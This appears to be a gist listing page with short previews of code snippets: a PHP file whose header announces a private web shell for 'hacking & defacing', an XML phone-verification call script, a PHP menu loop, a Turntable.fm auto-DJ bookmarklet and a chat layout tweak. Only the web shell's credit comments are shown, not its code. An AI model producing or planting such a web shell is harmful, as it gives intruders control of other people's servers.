gistfile1.php<?php /* NO LEAKED NO DJANCOEX NO FUCK3R */ /* THIS IS PHP WEB SHELL PRIVATE OF GRUP FB D’MASTERPIECE */ /* CODED FIRST BY OM KETEK B374K SHELL */ /* RECODED BY ANDRIPZF DM5HELL PRIV9 2013 */ /* AMATERASU VERSION GO TO HELL */ /* HAPPY HACKING & DEFACING */ /* THX TO ALL […]
gistfile1.xml<Response> <Speak voice="WOMAN"> Thank you for calling the Third Party Verification Secure Terminal regarding the Bob Electric Customer Choice Program. For your protection and quality assurance, this call will be recorded. </Speak> <Speak voice="MAN"> Thank you for calling the Third Party Verification Secure Terminal regarding the Bob Electric Customer Choice Program. For your protection and […]
menu sections
gistfile1.php<?php #count all sections and go through each one to create a menu for ($i = 0; $i < count($sections); $i++) { echo ‘<li’.($s == $sections[$i] ? ‘ class="current_page_item">’ : ‘>’); echo ‘<a href="/’.$sections[$i].’"><span><strong>’.$sectionstitle[$i].'</strong><span class="navi-description">’.$sectionssubtitle[$i].'</span></span></a>’; echo ‘<ul class="sub-menu">’; # search through current section to build sub-menu items $section = $sections[$i]; foreach ($$section as $submenukey => […]
Turntable.fm DJ Script
autodj.bookmarklet.jsjavascript:(function(g,d,f){if(f)d.info("Session found:",f);else return d.warn("No session found!");var h={check:10,wait:500},b=g.autodj={api:g[f],available:function(a){return b.api.taken_dj_map[a]<0},spot:function(){return b.api.become_dj.data("spot")},become:function(a){b.api.callback("become_dj",a)},waiter:function(a){return function(){return b.available(a)?(b.become(a),a):(d.info("Waiting…"),-1)}},seated:function(a){return b.api.djs[a]&&b.api.djs[a][0]===b.api.myuserid},wait:function(a,c){var e=c!==void 0, a=a||h.check,c=c||b.spot();b.seated(c)?d.warn("Spot",c,"taken!"):(e&&d.error("Spot",c,"missed. Restarting…"),d.info("Polling @",a,"ms"),b.check(a,b.waiter(c)))},check:function(a,c){setTimeout(function(){var e=c.call(b);e>0?(d.warn("Spot",e,"open…"),setTimeout(function(){b.wait(a,e)},h.wait)):b.check(a,c)},a)}}})(window,console,function(g,d,f,h,b,a,c,e,i,j,k){try{return g(d)[f](h)[b][a][c][e]()[i](j)[k]}catch(l){return null}}(jQuery,".invite_dj","data","events","click",0,"handler","toString","match", /{s*(.+)./,1));autodj.wait();autodj.js/*global window, console, jQuery */ (function(global, out, session){ if (!session) { return out.warn("No session found!"); } else { out.info("Session found:", session); } var config = { check: 10, wait: 500 }, dj = global.autodj = […]
Turntable Chat Window
ttchat$(‘.chat-container’).appendTo(‘body’).width((($(window).width()-$(‘#outer’).width())/2)+’px’).height($(‘#outer’).height()+’px’).css(‘top’,’0′).css(‘left’,’0′); $(‘.messages’).height(($(‘#outer’).height()-40-25)+’px’); $(‘.message’).width(‘100%’); $(‘.messages’).bind(‘DOMNodeInserted’,function(){$(this).find(‘.message’).last().width(‘100%’);}); $(‘.playlist-container’).height(($(‘#outer’).height()-40-56)+’px’); $(‘.queueView’).height(($(‘#outer’).height()-40-82)+’px’); $(‘.songlist’).height(($(‘#outer’).height()-40-125)+’px’);